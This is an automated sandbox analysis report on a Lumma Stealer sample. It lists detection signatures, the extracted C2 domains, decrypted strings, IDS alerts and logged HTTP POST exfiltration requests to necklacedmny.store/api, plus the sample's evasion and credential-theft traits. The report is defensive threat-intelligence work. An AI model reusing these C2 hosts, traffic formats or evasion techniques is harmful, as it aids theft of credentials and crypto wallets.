Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1544045
MD5:	e9d35001e68e949a301d6d0073be4661
SHA1:	a378145e6a306b2e7c4f87508906263ab9863a76
SHA256:	d500d4168637de6e15d03181eff6abdb01c45cea42bfe20562ac9496bafb3308
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Detected potential crypto function

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 5936 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E9D35001E68E949A301D6D0073BE4661)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["crisiwarny.store", "navygenerayk.store", "necklacedmny.store", "fadehairucw.store", "founpiuer.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2909718678.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5936	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 5936	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5936	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T18:43:08.002228+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49709	188.114.96.3	443	TCP
2024-10-28T18:43:09.203893+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49711	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T18:43:08.002228+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49709	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T18:43:09.203893+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49711	188.114.96.3	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T18:44:58.474401+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49989	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: file.exe.5936.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["crisiwarny.store", "navygenerayk.store", "necklacedmny.store", "fadehairucw.store", "founpiuer.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: scriptyprefej.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: navygenerayk.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: founpiuer.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: necklacedmny.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: thumbystriw.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: fadehairucw.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: crisiwarny.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: presticitpo.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: presticitpo.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 4SD0y4--legendaryy

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49992 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\CEF	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.adobe.dunamis	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\D3DSCache	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\LocalLow\Microsoft	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49989 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: scriptyprefej.store

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12864Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15110Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19968Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1199Host: necklacedmny.store

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic	DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic	DNS traffic detected: DNS query: necklacedmny.store

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store

Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, file.exe, 00000000.00000003.3278936830.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049052120.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3288959776.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3289238739.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302911501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3296964190.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049021102.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000002.3302911501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3296964190.0000000000E69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/:
Source: file.exe, 00000000.00000003.3271814012.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302799691.0000000000E43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302511591.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3296847581.0000000000E43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.2906265983.000000000558E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/api1R
Source: file.exe, 00000000.00000003.2779545659.000000000557A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2906265983.000000000558E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783683921.000000000557F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2785869789.000000000558B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2787512448.000000000558E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/api;m
Source: file.exe, 00000000.00000003.3271527180.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3271793739.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049021102.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apiY
Source: file.exe, 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apid
Source: file.exe, 00000000.00000003.3297236452.0000000000E50000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3289149331.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3279193517.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302799691.0000000000E51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apihmm
Source: file.exe, 00000000.00000003.3297236452.0000000000E50000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302799691.0000000000E51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apisco
Source: file.exe, 00000000.00000003.3278936830.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/z
Source: file.exe, 00000000.00000003.3295643182.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store:443/api
Source: file.exe, 00000000.00000002.3302511591.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store:443/apiK
Source: file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2787465347.00000000055B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2787465347.00000000055B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49992 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\file.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E59D40	0_3_00E59D40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E59D40	0_3_00E59D40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0558979F	0_3_0558979F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0558979F	0_3_0558979F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0558979F	0_3_0558979F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0558979F	0_3_0558979F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E59D40	0_3_00E59D40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E59D40	0_3_00E59D40

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: ZLIB complexity 0.9978325822884012

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

